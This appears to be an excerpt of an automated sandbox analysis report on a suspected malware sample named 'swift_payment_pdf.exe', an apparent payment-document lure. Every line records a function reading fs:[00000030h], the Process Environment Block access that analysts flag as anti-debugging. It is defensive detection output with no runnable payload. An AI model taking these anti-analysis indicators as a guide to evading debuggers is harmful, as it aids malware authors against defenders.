            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D05A7 mov eax, dword ptr fs:[00000030h]5_2_013D05A7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D05A7 mov eax, dword ptr fs:[00000030h]5_2_013D05A7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D05A7 mov eax, dword ptr fs:[00000030h]5_2_013D05A7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E59C mov eax, dword ptr fs:[00000030h]5_2_0138E59C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01384588 mov eax, dword ptr fs:[00000030h]5_2_01384588
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01352582 mov eax, dword ptr fs:[00000030h]5_2_01352582
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01352582 mov ecx, dword ptr fs:[00000030h]5_2_01352582
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E5E7 mov eax, dword ptr fs:[00000030h]5_2_0137E5E7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013525E0 mov eax, dword ptr fs:[00000030h]5_2_013525E0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138C5ED mov eax, dword ptr fs:[00000030h]5_2_0138C5ED
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138C5ED mov eax, dword ptr fs:[00000030h]5_2_0138C5ED
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013565D0 mov eax, dword ptr fs:[00000030h]5_2_013565D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A5D0 mov eax, dword ptr fs:[00000030h]5_2_0138A5D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A5D0 mov eax, dword ptr fs:[00000030h]5_2_0138A5D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E5CF mov eax, dword ptr fs:[00000030h]5_2_0138E5CF
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E5CF mov eax, dword ptr fs:[00000030h]5_2_0138E5CF
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134C427 mov eax, dword ptr fs:[00000030h]5_2_0134C427
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134E420 mov eax, dword ptr fs:[00000030h]5_2_0134E420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134E420 mov eax, dword ptr fs:[00000030h]5_2_0134E420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134E420 mov eax, dword ptr fs:[00000030h]5_2_0134E420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140A456 mov eax, dword ptr fs:[00000030h]5_2_0140A456
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D6420 mov eax, dword ptr fs:[00000030h]5_2_013D6420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D6420 mov eax, dword ptr fs:[00000030h]5_2_013D6420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D6420 mov eax, dword ptr fs:[00000030h]5_2_013D6420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D6420 mov eax, dword ptr fs:[00000030h]5_2_013D6420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D6420 mov eax, dword ptr fs:[00000030h]5_2_013D6420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D6420 mov eax, dword ptr fs:[00000030h]5_2_013D6420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D6420 mov eax, dword ptr fs:[00000030h]5_2_013D6420
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01388402 mov eax, dword ptr fs:[00000030h]5_2_01388402
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01388402 mov eax, dword ptr fs:[00000030h]5_2_01388402
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01388402 mov eax, dword ptr fs:[00000030h]5_2_01388402
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137A470 mov eax, dword ptr fs:[00000030h]5_2_0137A470
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137A470 mov eax, dword ptr fs:[00000030h]5_2_0137A470
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137A470 mov eax, dword ptr fs:[00000030h]5_2_0137A470
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DC460 mov ecx, dword ptr fs:[00000030h]5_2_013DC460
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134645D mov eax, dword ptr fs:[00000030h]5_2_0134645D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137245A mov eax, dword ptr fs:[00000030h]5_2_0137245A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E443 mov eax, dword ptr fs:[00000030h]5_2_0138E443
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E443 mov eax, dword ptr fs:[00000030h]5_2_0138E443
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E443 mov eax, dword ptr fs:[00000030h]5_2_0138E443
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E443 mov eax, dword ptr fs:[00000030h]5_2_0138E443
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E443 mov eax, dword ptr fs:[00000030h]5_2_0138E443
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E443 mov eax, dword ptr fs:[00000030h]5_2_0138E443
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E443 mov eax, dword ptr fs:[00000030h]5_2_0138E443
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138E443 mov eax, dword ptr fs:[00000030h]5_2_0138E443
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013844B0 mov ecx, dword ptr fs:[00000030h]5_2_013844B0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DA4B0 mov eax, dword ptr fs:[00000030h]5_2_013DA4B0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013564AB mov eax, dword ptr fs:[00000030h]5_2_013564AB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013504E5 mov ecx, dword ptr fs:[00000030h]5_2_013504E5
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0140A49A mov eax, dword ptr fs:[00000030h]5_2_0140A49A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138273C mov eax, dword ptr fs:[00000030h]5_2_0138273C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138273C mov ecx, dword ptr fs:[00000030h]5_2_0138273C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138273C mov eax, dword ptr fs:[00000030h]5_2_0138273C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CC730 mov eax, dword ptr fs:[00000030h]5_2_013CC730
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138C720 mov eax, dword ptr fs:[00000030h]5_2_0138C720
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138C720 mov eax, dword ptr fs:[00000030h]5_2_0138C720
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01350710 mov eax, dword ptr fs:[00000030h]5_2_01350710
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01380710 mov eax, dword ptr fs:[00000030h]5_2_01380710
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138C700 mov eax, dword ptr fs:[00000030h]5_2_0138C700
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01358770 mov eax, dword ptr fs:[00000030h]5_2_01358770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360770 mov eax, dword ptr fs:[00000030h]5_2_01360770
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DE75D mov eax, dword ptr fs:[00000030h]5_2_013DE75D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01350750 mov eax, dword ptr fs:[00000030h]5_2_01350750
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D4755 mov eax, dword ptr fs:[00000030h]5_2_013D4755
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392750 mov eax, dword ptr fs:[00000030h]5_2_01392750
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392750 mov eax, dword ptr fs:[00000030h]5_2_01392750
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138674D mov esi, dword ptr fs:[00000030h]5_2_0138674D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138674D mov eax, dword ptr fs:[00000030h]5_2_0138674D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138674D mov eax, dword ptr fs:[00000030h]5_2_0138674D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013507AF mov eax, dword ptr fs:[00000030h]5_2_013507AF
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F678E mov eax, dword ptr fs:[00000030h]5_2_013F678E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013547FB mov eax, dword ptr fs:[00000030h]5_2_013547FB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013547FB mov eax, dword ptr fs:[00000030h]5_2_013547FB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013727ED mov eax, dword ptr fs:[00000030h]5_2_013727ED
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013727ED mov eax, dword ptr fs:[00000030h]5_2_013727ED
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013727ED mov eax, dword ptr fs:[00000030h]5_2_013727ED
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DE7E1 mov eax, dword ptr fs:[00000030h]5_2_013DE7E1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014047A0 mov eax, dword ptr fs:[00000030h]5_2_014047A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135C7C0 mov eax, dword ptr fs:[00000030h]5_2_0135C7C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D07C3 mov eax, dword ptr fs:[00000030h]5_2_013D07C3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136E627 mov eax, dword ptr fs:[00000030h]5_2_0136E627
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01386620 mov eax, dword ptr fs:[00000030h]5_2_01386620
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01388620 mov eax, dword ptr fs:[00000030h]5_2_01388620
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135262C mov eax, dword ptr fs:[00000030h]5_2_0135262C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01392619 mov eax, dword ptr fs:[00000030h]5_2_01392619
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141866E mov eax, dword ptr fs:[00000030h]5_2_0141866E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141866E mov eax, dword ptr fs:[00000030h]5_2_0141866E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE609 mov eax, dword ptr fs:[00000030h]5_2_013CE609
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136260B mov eax, dword ptr fs:[00000030h]5_2_0136260B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136260B mov eax, dword ptr fs:[00000030h]5_2_0136260B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136260B mov eax, dword ptr fs:[00000030h]5_2_0136260B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136260B mov eax, dword ptr fs:[00000030h]5_2_0136260B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136260B mov eax, dword ptr fs:[00000030h]5_2_0136260B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136260B mov eax, dword ptr fs:[00000030h]5_2_0136260B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136260B mov eax, dword ptr fs:[00000030h]5_2_0136260B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01382674 mov eax, dword ptr fs:[00000030h]5_2_01382674
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A660 mov eax, dword ptr fs:[00000030h]5_2_0138A660
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A660 mov eax, dword ptr fs:[00000030h]5_2_0138A660
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0136C640 mov eax, dword ptr fs:[00000030h]5_2_0136C640
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013866B0 mov eax, dword ptr fs:[00000030h]5_2_013866B0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138C6A6 mov eax, dword ptr fs:[00000030h]5_2_0138C6A6
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01354690 mov eax, dword ptr fs:[00000030h]5_2_01354690
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01354690 mov eax, dword ptr fs:[00000030h]5_2_01354690
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D06F1 mov eax, dword ptr fs:[00000030h]5_2_013D06F1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D06F1 mov eax, dword ptr fs:[00000030h]5_2_013D06F1
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE6F2 mov eax, dword ptr fs:[00000030h]5_2_013CE6F2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE6F2 mov eax, dword ptr fs:[00000030h]5_2_013CE6F2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE6F2 mov eax, dword ptr fs:[00000030h]5_2_013CE6F2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE6F2 mov eax, dword ptr fs:[00000030h]5_2_013CE6F2
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0138A6C7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A6C7 mov eax, dword ptr fs:[00000030h]5_2_0138A6C7
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424940 mov eax, dword ptr fs:[00000030h]5_2_01424940
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E892B mov eax, dword ptr fs:[00000030h]5_2_013E892B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D892A mov eax, dword ptr fs:[00000030h]5_2_013D892A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01348918 mov eax, dword ptr fs:[00000030h]5_2_01348918
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01348918 mov eax, dword ptr fs:[00000030h]5_2_01348918
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DC912 mov eax, dword ptr fs:[00000030h]5_2_013DC912
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE908 mov eax, dword ptr fs:[00000030h]5_2_013CE908
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CE908 mov eax, dword ptr fs:[00000030h]5_2_013CE908
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DC97C mov eax, dword ptr fs:[00000030h]5_2_013DC97C
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F4978 mov eax, dword ptr fs:[00000030h]5_2_013F4978
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F4978 mov eax, dword ptr fs:[00000030h]5_2_013F4978
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01376962 mov eax, dword ptr fs:[00000030h]5_2_01376962
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01376962 mov eax, dword ptr fs:[00000030h]5_2_01376962
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01376962 mov eax, dword ptr fs:[00000030h]5_2_01376962
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0139096E mov eax, dword ptr fs:[00000030h]5_2_0139096E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0139096E mov edx, dword ptr fs:[00000030h]5_2_0139096E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0139096E mov eax, dword ptr fs:[00000030h]5_2_0139096E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D0946 mov eax, dword ptr fs:[00000030h]5_2_013D0946
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D89B3 mov esi, dword ptr fs:[00000030h]5_2_013D89B3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D89B3 mov eax, dword ptr fs:[00000030h]5_2_013D89B3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013D89B3 mov eax, dword ptr fs:[00000030h]5_2_013D89B3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141A9D3 mov eax, dword ptr fs:[00000030h]5_2_0141A9D3
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013629A0 mov eax, dword ptr fs:[00000030h]5_2_013629A0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013509AD mov eax, dword ptr fs:[00000030h]5_2_013509AD
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013509AD mov eax, dword ptr fs:[00000030h]5_2_013509AD
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013829F9 mov eax, dword ptr fs:[00000030h]5_2_013829F9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013829F9 mov eax, dword ptr fs:[00000030h]5_2_013829F9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DE9E0 mov eax, dword ptr fs:[00000030h]5_2_013DE9E0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A9D0 mov eax, dword ptr fs:[00000030h]5_2_0135A9D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A9D0 mov eax, dword ptr fs:[00000030h]5_2_0135A9D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A9D0 mov eax, dword ptr fs:[00000030h]5_2_0135A9D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A9D0 mov eax, dword ptr fs:[00000030h]5_2_0135A9D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A9D0 mov eax, dword ptr fs:[00000030h]5_2_0135A9D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135A9D0 mov eax, dword ptr fs:[00000030h]5_2_0135A9D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013849D0 mov eax, dword ptr fs:[00000030h]5_2_013849D0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E69C0 mov eax, dword ptr fs:[00000030h]5_2_013E69C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01372835 mov eax, dword ptr fs:[00000030h]5_2_01372835
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01372835 mov eax, dword ptr fs:[00000030h]5_2_01372835
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01372835 mov eax, dword ptr fs:[00000030h]5_2_01372835
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01372835 mov ecx, dword ptr fs:[00000030h]5_2_01372835
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01372835 mov eax, dword ptr fs:[00000030h]5_2_01372835
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01372835 mov eax, dword ptr fs:[00000030h]5_2_01372835
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F483A mov eax, dword ptr fs:[00000030h]5_2_013F483A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F483A mov eax, dword ptr fs:[00000030h]5_2_013F483A
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138A830 mov eax, dword ptr fs:[00000030h]5_2_0138A830
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DC810 mov eax, dword ptr fs:[00000030h]5_2_013DC810
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E6870 mov eax, dword ptr fs:[00000030h]5_2_013E6870
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E6870 mov eax, dword ptr fs:[00000030h]5_2_013E6870
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DE872 mov eax, dword ptr fs:[00000030h]5_2_013DE872
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DE872 mov eax, dword ptr fs:[00000030h]5_2_013DE872
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01380854 mov eax, dword ptr fs:[00000030h]5_2_01380854
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01354859 mov eax, dword ptr fs:[00000030h]5_2_01354859
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01354859 mov eax, dword ptr fs:[00000030h]5_2_01354859
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01362840 mov ecx, dword ptr fs:[00000030h]5_2_01362840
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_014208C0 mov eax, dword ptr fs:[00000030h]5_2_014208C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DC89D mov eax, dword ptr fs:[00000030h]5_2_013DC89D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141A8E4 mov eax, dword ptr fs:[00000030h]5_2_0141A8E4
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01350887 mov eax, dword ptr fs:[00000030h]5_2_01350887
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138C8F9 mov eax, dword ptr fs:[00000030h]5_2_0138C8F9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138C8F9 mov eax, dword ptr fs:[00000030h]5_2_0138C8F9
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137E8C0 mov eax, dword ptr fs:[00000030h]5_2_0137E8C0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0141AB40 mov eax, dword ptr fs:[00000030h]5_2_0141AB40
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01404B4B mov eax, dword ptr fs:[00000030h]5_2_01404B4B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01404B4B mov eax, dword ptr fs:[00000030h]5_2_01404B4B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01422B57 mov eax, dword ptr fs:[00000030h]5_2_01422B57
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01422B57 mov eax, dword ptr fs:[00000030h]5_2_01422B57
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01422B57 mov eax, dword ptr fs:[00000030h]5_2_01422B57
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01422B57 mov eax, dword ptr fs:[00000030h]5_2_01422B57
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137EB20 mov eax, dword ptr fs:[00000030h]5_2_0137EB20
